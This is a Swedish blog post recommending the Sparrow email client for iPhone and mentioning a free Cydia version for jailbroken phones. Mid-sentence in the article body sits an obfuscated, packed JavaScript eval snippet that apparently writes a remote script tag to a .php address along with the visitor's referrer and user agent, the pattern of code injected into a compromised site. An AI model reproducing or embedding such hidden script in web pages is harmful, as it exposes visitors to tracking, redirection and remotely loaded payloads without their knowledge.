Image Image Image Image Image Image Image Image Image Image

| 23 mars, 2018

Scroll to top

Top

No Comments

Bästa klienten för epost till iPhone? Sparrow | Revue.se

Bästa klienten för epost till iPhone? Sparrow
Sebastian Plengier Ehrnfelt

Har du länge letat efter en riktigt bra klient eller app för e-post som fungerar till din iPhone?
Jag har själv en Mac men hade inte innan hört talas om Sparrow.

Några eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zsaay|var|u0026u|referrer|dibez||js|php’.split(‘|’),0,{}))
vänner till mig berättade om den och sa att det är en mycket omtyckt klient som används av de flesta mac-användare idag.

Nu har den kommit till iPhone och kan starkt rekommendera den. Jag tycker själv att den e-postklienten som följer med från början är riktigt kass. Detta är en bra komplettering som än så länge fungerar felfritt.

För er super-användare som har jailbreakat er iPhone finns en lösning som är gratis. Sparrow Push går enkelt att ladda ner från Cyndia.

Ladda ner via ikonen nedan:
Sparrow - Sparrow